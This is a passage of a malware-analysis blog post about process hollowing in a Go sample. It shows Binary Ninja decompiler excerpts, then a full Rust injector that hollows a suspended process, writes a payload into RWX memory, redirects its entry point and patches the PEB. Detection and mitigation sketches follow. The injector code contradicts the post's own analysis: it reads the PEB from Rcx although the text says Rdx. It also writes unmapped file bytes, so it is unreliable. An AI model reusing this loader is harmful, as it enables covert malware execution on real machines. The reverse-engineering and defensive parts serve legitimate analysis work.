1400788ba        int128_t* rax_5 = runtime.newobject(rcx_2, zmm1_1, &data_14014c9e0, arg5, zmm0_1)
1400788d5        rax_5[3].d = 0x100002
1400788ed        if (main.Get_ThreadContext(rcx_3, zmm1_2, *(arg3 + 8), rax_5, arg5, zmm0_2) == 0)
140078908        return *(rax_5 + 0x88)

For 64-bit processes, the function gets the thread context and retrieves the PEB address from offset 0x88 in the CONTEXT structure, which corresponds to the RDX register (RCX is at 0x80). In the initial context of a newly created 64-bit process, RDX holds the PEB address, while RCX holds the image entry point.
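Since the HLIL only shows raw offsets, a small lookup table makes it easier to see which register each access touches. The sketch below covers just the fields that appear in these listings, using the documented CONTEXT and WOW64_CONTEXT layouts; the function names are hypothetical.

```rust
/// Field name at a byte offset in the x64 CONTEXT structure (0x4d0 bytes).
fn amd64_context_field(offset: usize) -> Option<&'static str> {
    Some(match offset {
        0x30 => "ContextFlags",
        0x78 => "Rax",
        0x80 => "Rcx",
        0x88 => "Rdx",
        0x90 => "Rbx",
        0x98 => "Rsp",
        0xF8 => "Rip",
        _ => return None,
    })
}

/// Field name at a byte offset in WOW64_CONTEXT (0x2cc bytes).
fn wow64_context_field(offset: usize) -> Option<&'static str> {
    Some(match offset {
        0x00 => "ContextFlags",
        0xA4 => "Ebx",
        0xA8 => "Edx",
        0xAC => "Ecx",
        0xB0 => "Eax",
        0xB8 => "Eip",
        0xC4 => "Esp",
        _ => return None,
    })
}

/// Binary Ninja indexes a typed pointer in units of the element size,
/// so an int128_t* index must be multiplied by 16 to get a byte offset.
fn hlil_index_to_offset(index: usize, element_size: usize) -> usize {
    index * element_size
}
```

Applying this to the listings, the offsets 0x88 and 0xa4 resolve to Rdx and Ebx, and the int128_t* indices 8 and 0xb resolve to Rcx and Eax.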

Function: mw_WriteProcessMemory (Memory Writing)

Address: 0x1400782e0

This is a wrapper around the Windows WriteProcessMemory API. Binary Ninja’s HLIL shows:

HLIL Code from Binary Ninja:

140078306        rcx, zmm0, zmm1 = main.Write_ProcessMemory.func1(arg1, arg5, zmm15)
140078312        rax, rcx_1, zmm0_1, zmm1_1 = runtime.newobject(rcx, zmm1, &data_140135580, arg5, zmm0)
140078323        rax_1, rdx, zmm1_2 = runtime.newobject(rcx_1, zmm1_1, &data_1401364c0, arg5, zmm0_1)
14007832d        *rax_1 = arg2
140078335        *(rax_1 + 8) = arg3
14007833e        rax_1[1].q = arg1
140078347        *(rax_1 + 0x18) = arg4

The function prepares the parameters for WriteProcessMemory. The parameters include the base address in the target process (arg2), the buffer to write (arg3), the size to write (arg1), and a pointer to receive the number of bytes written (arg4). These parameters are organized into a structure that will be passed to the Windows API.

140078371        void** const result = nullptr
140078376        if (syscall.(*LazyProc).Call(5, rdx, main.SWrite_ProcessMemory, rax_1, 5, arg5, zmm1_2) == 0)

The function calls WriteProcessMemory through Go’s syscall package, which writes the payload data into the target process memory. syscall.LazyProc resolves the export the first time it is called, which is why API calls in Go binaries show up as (*LazyProc).Call rather than as direct imports.

Function: mw_VirtualAllocEx (Memory Allocation)

Address: 0x140076c80

This is a wrapper around VirtualAllocEx. The HLIL code from Binary Ninja shows:

HLIL Code from Binary Ninja:

140076caf        void* main.modkernel32_1 = main.modkernel32
140076ced        rax[1].q = 0xe
140076d18        *(rax + 8) = "VirtualAllocExfile too largeis a directorylevel 2 haltedlevel 3 …"

The function references the kernel32.dll module handle and prepares to call VirtualAllocEx. The string length 0xe (14 characters) corresponds to “VirtualAllocEx”, which is the function name being resolved. Go strings are (pointer, length) pairs without a NUL terminator, and the linker packs string data back to back, which is why the disassembler shows unrelated text running on after the name.
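Recovering the real string from such a run-on literal only needs the length stored next to the pointer. A minimal sketch, with a hypothetical helper name:

```rust
/// Extracts a Go string from a packed string blob, given the length that
/// the binary stores alongside the pointer.
fn go_string(blob: &[u8], len: usize) -> Option<&str> {
    std::str::from_utf8(blob.get(..len)?).ok()
}
```

Calling go_string on the bytes of the literal above with a length of 0xe yields the API name on its own, without the unrelated text that follows it.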

140076d2d        *rax_1 = arg3
140076d35        rax_1[1] = arg4
140076d3e        rax_1[2] = arg1
140076d47        rax_1[3] = zx.q(arg6)
140076d50        rax_1[4] = zx.q(arg5)

The function sets up the parameters for VirtualAllocEx. These include the base address (which can be NULL to let Windows choose), the size to allocate, the process handle, the allocation type, and the memory protection flags. These parameters are organized into an array that will be passed to the Windows API.

140076d64        result, zmm15 = syscall.(*LazyProc).Call(5, rdx, rax, rax_1, 5, arg7, zmm1_1)

Finally, the function calls VirtualAllocEx via the syscall wrapper to allocate executable memory in the target process. The allocated memory address is returned, which will be used as the base address for writing the payload.


Rust Implementation Guide

Now let’s create a complete Rust implementation based on what we learned from analyzing the malware sample. This implementation is for educational purposes only and demonstrates how process hollowing can be implemented in Rust. The code includes comprehensive error handling, proper PE parsing, relocation handling, architecture detection, and resource management.

The implementation uses a struct-based approach that encapsulates the process hollowing functionality. This makes the code more maintainable and easier to understand. Each step of the process hollowing operation is implemented as a method, allowing for fine-grained control over the injection process.

use std::ffi::OsStr;
use std::os::windows::ffi::OsStrExt;
use std::ptr;
use winapi::shared::minwindef::*;
use winapi::um::errhandlingapi::GetLastError;
use winapi::um::libloaderapi::{GetModuleHandleA, GetProcAddress};
use winapi::um::memoryapi::*;
use winapi::um::processthreadsapi::*;
use winapi::um::winbase::*;
use winapi::um::winnt::*;

pub struct ProcessHollowing {
    process_handle: HANDLE,
    thread_handle: HANDLE,
    payload_base: *mut c_void,
    is_64bit: bool,
}

impl ProcessHollowing {
    /// Create a new process hollowing instance
    pub fn new(target_path: &str) -> Result<Self, String> {
        let (process_handle, thread_handle) = Self::create_suspended_process(target_path)?;

        Ok(Self {
            process_handle,
            thread_handle,
            payload_base: ptr::null_mut(),
            is_64bit: false,
        })
    }

    /// Step 1: Create suspended process
    fn create_suspended_process(target_path: &str) -> Result<(HANDLE, HANDLE), String> {
        let mut si: STARTUPINFOW = unsafe { std::mem::zeroed() };
        let mut pi: PROCESS_INFORMATION = unsafe { std::mem::zeroed() };

        si.cb = std::mem::size_of::<STARTUPINFOW>() as u32;

        let target_path_wide: Vec<u16> = OsStr::new(target_path)
            .encode_wide()
            .chain(Some(0))
            .collect();

        let success = unsafe {
            CreateProcessW(
                ptr::null(),
                target_path_wide.as_ptr() as *mut u16,
                ptr::null_mut(),
                ptr::null_mut(),
                FALSE,
                CREATE_SUSPENDED,
                ptr::null_mut(),
                ptr::null(),
                &mut si,
                &mut pi,
            )
        };

        if success == 0 {
            return Err(format!("CreateProcess failed: {}", unsafe { GetLastError() }));
        }

        Ok((pi.hProcess, pi.hThread))
    }

    /// Step 2: Allocate memory for payload
    pub fn allocate_payload(&mut self, payload: &[u8], preferred_base: Option<u64>) -> Result<(), String> {
        // Parse PE to get ImageBase
        let image_base = preferred_base.unwrap_or_else(|| {
            Self::get_preferred_image_base(payload).unwrap_or(0x400000)
        });

        let size = Self::get_image_size(payload)?;

        let allocated = unsafe {
            VirtualAllocEx(
                self.process_handle,
                image_base as *mut c_void,
                size,
                MEM_COMMIT | MEM_RESERVE,
                PAGE_EXECUTE_READWRITE,
            )
        };

        if allocated.is_null() {
            // Try without preferred base
            let allocated = unsafe {
                VirtualAllocEx(
                    self.process_handle,
                    ptr::null_mut(),
                    size,
                    MEM_COMMIT | MEM_RESERVE,
                    PAGE_EXECUTE_READWRITE,
                )
            };

            if allocated.is_null() {
                return Err(format!("VirtualAllocEx failed: {}", unsafe { GetLastError() }));
            }

            self.payload_base = allocated;
        } else {
            self.payload_base = allocated;
        }

        Ok(())
    }

    /// Step 3: Write payload to process
    pub fn write_payload(&self, payload: &[u8]) -> Result<(), String> {
        if self.payload_base.is_null() {
            return Err("Payload base not allocated".to_string());
        }

        // Handle PE relocations if needed
        let relocated_payload = Self::relocate_payload(payload, self.payload_base as u64)?;

        let mut bytes_written: usize = 0;
        let success = unsafe {
            WriteProcessMemory(
                self.process_handle,
                self.payload_base,
                relocated_payload.as_ptr() as *const c_void,
                relocated_payload.len(),
                &mut bytes_written,
            )
        };

        if success == 0 {
            return Err(format!("WriteProcessMemory failed: {}", unsafe { GetLastError() }));
        }

        if bytes_written != relocated_payload.len() {
            return Err(format!("Partial write: {}/{} bytes", bytes_written, relocated_payload.len()));
        }

        Ok(())
    }

    /// Step 4: Update PE headers
    pub fn update_pe_headers(&self) -> Result<u64, String> {
        // Read current PE headers from process
        let mut dos_header: IMAGE_DOS_HEADER = unsafe { std::mem::zeroed() };
        let mut bytes_read: usize = 0;

        unsafe {
            ReadProcessMemory(
                self.process_handle,
                self.payload_base,
                &mut dos_header as *const _ as *mut c_void,
                std::mem::size_of::<IMAGE_DOS_HEADER>(),
                &mut bytes_read,
            );
        }

        if dos_header.e_magic != IMAGE_DOS_SIGNATURE {
            return Err("Invalid DOS signature".to_string());
        }

        let nt_headers_offset = dos_header.e_lfanew as usize;
        let optional_header_offset = nt_headers_offset + 
            std::mem::size_of::<IMAGE_NT_SIGNATURE>() +
            std::mem::size_of::<IMAGE_FILE_HEADER>();

        // Update ImageBase
        let image_base = self.payload_base as u64;
        let mut bytes_written: usize = 0;

        unsafe {
            WriteProcessMemory(
                self.process_handle,
                (self.payload_base as usize + optional_header_offset + 0x18) as *mut c_void,
                &image_base as *const u64 as *const c_void,
                std::mem::size_of::<u64>(),
                &mut bytes_written,
            );
        }

        // Get entry point RVA
        let entry_point_rva = Self::get_entry_point_rva(self.process_handle, self.payload_base)?;
        let entry_point = self.payload_base as u64 + entry_point_rva as u64;

        Ok(entry_point)
    }

    /// Step 5: Update thread context
    pub fn update_thread_context(&self, entry_point: u64) -> Result<(), String> {
        let mut context: CONTEXT = unsafe { std::mem::zeroed() };
        context.ContextFlags = CONTEXT_FULL;

        let success = unsafe {
            GetThreadContext(self.thread_handle, &mut context)
        };

        if success == 0 {
            return Err(format!("GetThreadContext failed: {}", unsafe { GetLastError() }));
        }

        // Update instruction pointer
        context.Rip = entry_point;

        let success = unsafe {
            SetThreadContext(self.thread_handle, &context)
        };

        if success == 0 {
            return Err(format!("SetThreadContext failed: {}", unsafe { GetLastError() }));
        }

        Ok(())
    }

    /// Step 6: Update PEB
    pub fn update_peb(&self) -> Result<(), String> {
        let mut context: CONTEXT = unsafe { std::mem::zeroed() };
        context.ContextFlags = CONTEXT_FULL;

        unsafe {
            GetThreadContext(self.thread_handle, &mut context);
        }

        // PEB address is in RCX register (64-bit)
        let peb_address = context.Rcx as *mut u64;
        let image_base_offset = 0x10; // Offset of ImageBaseAddress in PEB
        let peb_image_base = unsafe {
            (peb_address as usize + image_base_offset) as *mut u64
        };

        let new_image_base = self.payload_base as u64;
        let mut bytes_written: usize = 0;

        unsafe {
            WriteProcessMemory(
                self.process_handle,
                peb_image_base as *mut c_void,
                &new_image_base as *const u64 as *const c_void,
                std::mem::size_of::<u64>(),
                &mut bytes_written,
            );
        }

        Ok(())
    }

    /// Step 7: Resume thread
    pub fn resume(&self) -> Result<(), String> {
        let result = unsafe { ResumeThread(self.thread_handle) };

        if result == u32::MAX {
            return Err(format!("ResumeThread failed: {}", unsafe { GetLastError() }));
        }

        Ok(())
    }

    /// Complete process hollowing operation
    pub fn execute(&mut self, payload: &[u8]) -> Result<(), String> {
        // Determine if payload is 64-bit
        self.is_64bit = Self::is_64bit_pe(payload)?;

        // Allocate memory
        self.allocate_payload(payload, None)?;

        // Write payload
        self.write_payload(payload)?;

        // Update PE headers
        let entry_point = self.update_pe_headers()?;

        // Update thread context
        self.update_thread_context(entry_point)?;

        // Update PEB
        self.update_peb()?;

        // Resume thread
        self.resume()?;

        Ok(())
    }

    // Helper functions for PE parsing and manipulation...
}

The implementation reports failures from the main API calls as Result errors. The PE parsing helpers, which are not shown above, extract the preferred image base, image size, and architecture from the payload. Relocation handling lets the payload load at an address other than its preferred base, and architecture detection lets the code distinguish 32-bit from 64-bit payloads. Resource management is meant to go through the Drop trait so that process and thread handles are closed even if an error occurs, although that implementation is not part of the listing either.


Detection and Mitigation

Detection Techniques

Behavioral analysis is one of the most effective ways to detect process hollowing. Security tools should monitor for processes created with the CREATE_SUSPENDED flag. The flag also has legitimate uses, so it is most meaningful in combination with the other signals listed here. Large memory allocations in newly created processes, especially with executable permissions, are another red flag. Thread context modifications made by another process before the new process runs its first instruction are highly suspicious, as legitimate software rarely rewrites the thread context of a process it has just created. PEB modifications, particularly changes to the ImageBaseAddress field, are another indicator. Finally, WriteProcessMemory calls to remote processes, especially large writes to newly created processes, should be monitored.
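The signals above are strongest when they occur in order against the same target process. Here is a minimal sketch of that correlation, assuming a telemetry source that already yields one event per monitored API call. The `Api` and `Event` types and the `flag_hollowing_candidates` function are hypothetical and do not correspond to any particular EDR product.

```rust
use std::collections::HashMap;

/// Hypothetical, simplified categories of monitored API activity.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum Api {
    CreateSuspended,
    RemoteAlloc,
    RemoteWrite,
    SetThreadContext,
    ResumeThread,
}

/// One telemetry record: which process was targeted and by which call.
struct Event {
    target_pid: u32,
    api: Api,
}

/// Return the PIDs for which the ordered sequence
/// create-suspended -> remote write -> set context -> resume was observed.
/// Unrelated events in between are ignored.
fn flag_hollowing_candidates(events: &[Event]) -> Vec<u32> {
    const PATTERN: [Api; 4] = [
        Api::CreateSuspended,
        Api::RemoteWrite,
        Api::SetThreadContext,
        Api::ResumeThread,
    ];
    // For each target PID, how many pattern steps have matched so far.
    let mut progress: HashMap<u32, usize> = HashMap::new();
    let mut flagged = Vec::new();
    for e in events {
        let step = progress.entry(e.target_pid).or_insert(0);
        if *step < PATTERN.len() && e.api == PATTERN[*step] {
            *step += 1;
            if *step == PATTERN.len() {
                flagged.push(e.target_pid);
            }
        }
    }
    flagged
}
```

A process that is merely created suspended and then resumed never completes the pattern, which keeps the common benign case from being flagged. A real detector would also weigh write sizes, memory protections, and the identity of the calling process.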

Static analysis can also be effective for detecting process hollowing. Analysts should look for CreateProcess calls with the CREATE_SUSPENDED flag, sequences of VirtualAllocEx followed by WriteProcessMemory, GetThreadContext and SetThreadContext calls, PEB manipulation code, and ResumeThread calls after context modification. These patterns, when found together, strongly suggest process hollowing.
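Because the sample resolves its APIs by name at run time, the function names appear as strings in the binary rather than as import table entries. A first-pass triage can therefore be a plain byte search. This is a minimal sketch with hypothetical function names and a hand-picked API list. It will miss samples that hash or encrypt their API names.

```rust
/// API names whose combined presence suggests process hollowing.
const SUSPICIOUS_APIS: [&str; 6] = [
    "CreateProcess",
    "VirtualAllocEx",
    "WriteProcessMemory",
    "GetThreadContext",
    "SetThreadContext",
    "ResumeThread",
];

/// Naive substring search over raw bytes.
fn contains(haystack: &[u8], needle: &[u8]) -> bool {
    !needle.is_empty() && haystack.windows(needle.len()).any(|w| w == needle)
}

/// Which of the suspicious API names occur anywhere in the binary.
fn matched_apis(binary: &[u8]) -> Vec<&'static str> {
    SUSPICIOUS_APIS
        .iter()
        .copied()
        .filter(|name| contains(binary, name.as_bytes()))
        .collect()
}

/// True only when every name in the list is present.
fn has_full_hollowing_api_set(binary: &[u8]) -> bool {
    matched_apis(binary).len() == SUSPICIOUS_APIS.len()
}
```

Any single name is common in benign software, so the sketch only reports a hit when the whole set is present. Even then the result is a reason to look closer, not a verdict.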

Memory analysis can reveal process hollowing by checking whether the process name matches the module actually loaded in memory, whether the image at the PEB ImageBaseAddress corresponds to the file on disk, whether there are private memory regions with executable permissions that no file backs, and whether code sections match the original executable. Any of these discrepancies indicates that the process has been modified from its original state.
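One of these checks, comparing the headers of the in-memory image against the file on disk, can be sketched as follows. It assumes the analyst already has both byte buffers, for instance from a memory dump and the executable file. `PeSummary`, `summarize_pe`, and `header_mismatch` are hypothetical names. The field offsets follow the Microsoft PE format specification.

```rust
/// Header fields that should be identical on disk and in memory.
/// ImageBase is deliberately excluded because ASLR may legitimately change it.
#[derive(Debug, PartialEq, Eq)]
struct PeSummary {
    machine: u16,
    is_64bit: bool,
    entry_point_rva: u32,
    size_of_image: u32,
}

fn read_u16(buf: &[u8], off: usize) -> Option<u16> {
    let b = buf.get(off..off.checked_add(2)?)?;
    Some(u16::from_le_bytes([b[0], b[1]]))
}

fn read_u32(buf: &[u8], off: usize) -> Option<u32> {
    let b = buf.get(off..off.checked_add(4)?)?;
    Some(u32::from_le_bytes([b[0], b[1], b[2], b[3]]))
}

/// Parse the few header fields needed for comparison; None if not a valid PE.
fn summarize_pe(buf: &[u8]) -> Option<PeSummary> {
    if read_u16(buf, 0)? != 0x5A4D {
        return None; // missing "MZ" signature
    }
    let nt = read_u32(buf, 0x3C)? as usize; // e_lfanew
    if buf.get(nt..nt.checked_add(4)?)? != &b"PE\0\0"[..] {
        return None;
    }
    let machine = read_u16(buf, nt.checked_add(4)?)?;
    let opt = nt.checked_add(24)?; // signature (4) + file header (20)
    let is_64bit = match read_u16(buf, opt)? {
        0x10B => false, // PE32
        0x20B => true,  // PE32+
        _ => return None,
    };
    Some(PeSummary {
        machine,
        is_64bit,
        entry_point_rva: read_u32(buf, opt.checked_add(16)?)?,
        size_of_image: read_u32(buf, opt.checked_add(56)?)?,
    })
}

/// Some(true) when both buffers parse as PE images but their summaries differ.
fn header_mismatch(disk: &[u8], memory: &[u8]) -> Option<bool> {
    Some(summarize_pe(disk)? != summarize_pe(memory)?)
}
```

A mismatch in architecture, entry point RVA, or image size between the file and the mapped image is a strong hint that the image was replaced. A `None` result means one of the buffers did not parse, which for the in-memory copy can itself be worth investigating.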

Mitigation Strategies

Process monitoring is a critical defense mechanism. Security tools should monitor process creation events and alert on suspended process creation. Tracking memory allocations in new processes can help identify suspicious behavior early. API hooking can be used to intercept critical APIs such as CreateProcess, WriteProcessMemory, and SetThreadContext, logging and analyzing suspicious patterns, and blocking known malicious sequences.

Memory protection mechanisms raise the cost of code injection in general, although none of them stops process hollowing on its own, because the attacker allocates the memory in the child process and chooses its protection directly. Data Execution Prevention (DEP) makes it harder to execute code from non-executable memory regions. Address Space Layout Randomization (ASLR) makes it more difficult to predict memory addresses, complicating the injection process. Control Flow Guard (CFG) helps prevent execution flow hijacking.
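Whether a given executable opts into these mitigations is recorded in the DllCharacteristics field of its PE optional header. Here is a minimal sketch of decoding that field, assuming the 16-bit value has already been read from the header. The function names are hypothetical, and the bit values are the ones documented in the PE format specification.

```rust
// Documented IMAGE_DLLCHARACTERISTICS_* bits for the three mitigations.
const DYNAMIC_BASE: u16 = 0x0040; // image can be relocated (ASLR)
const NX_COMPAT: u16 = 0x0100; // image is compatible with DEP
const GUARD_CF: u16 = 0x4000; // image supports Control Flow Guard

const MITIGATIONS: [(u16, &str); 3] = [
    (DYNAMIC_BASE, "ASLR"),
    (NX_COMPAT, "DEP"),
    (GUARD_CF, "CFG"),
];

/// Mitigations whose bit is set in the DllCharacteristics value.
fn enabled_mitigations(dll_characteristics: u16) -> Vec<&'static str> {
    MITIGATIONS
        .iter()
        .filter(|(bit, _)| (dll_characteristics & bit) != 0)
        .map(|(_, name)| *name)
        .collect()
}

/// Mitigations whose bit is clear in the DllCharacteristics value.
fn missing_mitigations(dll_characteristics: u16) -> Vec<&'static str> {
    MITIGATIONS
        .iter()
        .filter(|(bit, _)| (dll_characteristics & bit) == 0)
        .map(|(_, name)| *name)
        .collect()
}
```

A value of 0x4140 reports all three mitigations as enabled, while 0x0100 reports only DEP. Auditing these flags across the binaries in an environment shows where the baseline hardening is absent.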

Behavioral detection using machine learning models can identify anomalous process behavior. Anomaly detection for process creation patterns can flag unusual sequences of API calls. Network traffic analysis can reveal communication patterns that indicate malicious activity.

Code integrity measures can help ensure that only legitimate code executes. Code signing verification ensures that executables are from trusted sources. Module verification checks that loaded modules match their on-disk signatures. Process integrity checks can detect when a process has been modified from its original state.


Conclusion

Through my analysis of the malware sample from Malware Bazaar using Binary Ninja, I discovered a sophisticated implementation of process hollowing. This technique demonstrates the complexity of modern malware and the importance of thorough reverse engineering. Understanding how it works is crucial for malware analysts who need to reverse engineer and understand malicious behavior, security researchers who develop detection and mitigation strategies, defenders who protect systems from these attacks, and developers who need to understand Windows internals and process management.

The key takeaways from this analysis are as follows. Process hollowing replaces a legitimate process’s code with a malicious payload. The critical steps are creating a suspended process, allocating memory, writing the payload, updating the thread context, and resuming execution. PE format knowledge is essential for understanding the technique, PEB manipulation is crucial for successful execution, and detection requires monitoring process creation, memory operations, and context modifications.

For further reading, I recommend Windows Internals by Russinovich, Solomon, and Ionescu for deep understanding of Windows internals, the Microsoft PE Format Specification for detailed PE structure information, and malware analysis books such as Practical Malware Analysis and The Art of Memory Forensics for comprehensive analysis techniques.

This technique should only be used for security research, malware analysis, educational purposes, and authorized penetration testing. It should never be used for malicious purposes.


About This Analysis

This blog post documents my reverse engineering analysis of a malware sample obtained from Malware Bazaar for legitimate security research purposes. All HLIL code snippets were extracted directly from Binary Ninja during my analysis session. The goal of this research is to understand modern malware techniques, share knowledge with the security research community, help defenders develop better detection strategies, and educate security professionals about process hollowing.

⚠️ Important: This blog post is for educational purposes only. The malware sample was analyzed in a controlled environment for security research. The techniques described should only be used in authorized security research and malware analysis contexts.
